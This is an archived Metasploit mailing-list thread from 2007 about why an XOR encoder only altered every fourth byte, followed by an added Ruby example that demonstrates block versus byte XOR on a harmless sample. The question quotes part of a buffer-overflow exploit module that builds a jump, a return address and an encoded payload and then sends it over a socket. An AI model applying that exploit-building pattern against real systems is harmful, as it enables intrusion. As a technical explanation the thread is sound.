Metasploit mailing list archives
Need assistance with payload xor
From: mmiller at hick.org (mmiller at hick.org)
Date: Wed, 28 Mar 2007 23:29:32 -0700
On Wed, Mar 28, 2007 at 12:52:21PM -0500, ri0t wrote:
filler = rand_text_english(1) * (target['Offset'])
jump = [0xeb06eb06].pack("V")
retadd = [target.ret].pack('V')
buffer=jump+retadd+payload.encoded
buffercoded= xor.encode(buffer, [0xb3].pack("V"))
sploit = header + filler + buffercoded[0]
sock.put(sploit)
handler
disconnect
end
Unfortunately the xor.encode only XORs the first byte of jump, retadd
and payload, not the entire buffer. I am sure it's something I am
missing due to a simple lack of Ruby knowledge, but if anyone could
point me in the right direction I would be grateful.
Since you're using the Generic XOR, it defaults to using the size of the
key as the block size for encoding. I'm guessing what you actually want
to do is XOR each individual byte with 0xb3. To do this you should use
Rex::Encoding::Xor::Byte. Make sure you use [0xb3].pack("C"). I think
this should give you the results you're looking for. If it's still not
working let us know.
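The behaviour described in this reply can be reproduced without Rex. The following is an added example, not code from the thread or from the Metasploit/Rex project: block_xor and byte_xor are hypothetical stand-ins that model the two semantics named above (key length used as the block size, versus one key byte applied to every byte), and the 8-byte SAMPLE buffer is constructed for illustration. It shows why [0xb3].pack("V") is a four-byte key with three zero bytes, so only one byte in every four is touched, while [0xb3].pack("C") covers every byte.

```ruby
# Added example (not from the thread): a plain-Ruby model of the two XOR
# behaviours discussed above. It does not use Rex; block_xor and byte_xor are
# hypothetical stand-ins that reproduce the described semantics:
#   - block_xor: key length is the block size (the Generic XOR behaviour)
#   - byte_xor:  every byte is XORed with one key byte (the Xor::Byte behaviour)

# XOR buf against key, treating the key length as the block size. Each block
# is XORed byte-for-byte with the key, so a key with trailing zero bytes
# leaves the matching positions of every block untouched.
def block_xor(buf, key)
  raise ArgumentError, "key must be a non-empty String" if !key.is_a?(String) || key.empty?
  out = buf.bytes.each_with_index.map { |b, i| b ^ key.getbyte(i % key.bytesize) }
  out.pack("C*")
end

# XOR every byte of buf with a single key byte (a one-byte String).
def byte_xor(buf, key)
  raise ArgumentError, "key must be exactly one byte" unless key.is_a?(String) && key.bytesize == 1
  k = key.getbyte(0)
  buf.bytes.map { |b| b ^ k }.pack("C*")
end

# Constructed 8-byte sample input: distinct values so the effect of each
# encoder is visible. It is not shellcode.
SAMPLE = [0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08].pack("C*")

KEY_V = [0xb3].pack("V")   # "\xB3\x00\x00\x00": 4 bytes, three of them zero
KEY_C = [0xb3].pack("C")   # "\xB3": 1 byte

# Returns the byte offsets of plain that differ after encoding, so the
# difference between the two keys can be checked directly.
def changed_offsets(plain, encoded)
  plain.bytes.zip(encoded.bytes).each_with_index
       .select { |(a, b), _| a != b }
       .map { |_, i| i }
end

if __FILE__ == $0
  printf("pack('V') key is %d bytes, pack('C') key is %d bytes\n", KEY_V.bytesize, KEY_C.bytesize)
  p changed_offsets(SAMPLE, block_xor(SAMPLE, KEY_V)) # only offsets 0 and 4 change
  p changed_offsets(SAMPLE, byte_xor(SAMPLE, KEY_C))  # every offset 0..7 changes
  # XOR is its own inverse: decoding is the same operation with the same key.
  p byte_xor(byte_xor(SAMPLE, KEY_C), KEY_C) == SAMPLE
end
```

With the "V" key only offsets 0 and 4 of the sample change, which is exactly the "first byte of each 4-byte block" symptom in the question; with the "C" key every byte changes, and applying the same key again restores the original buffer.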
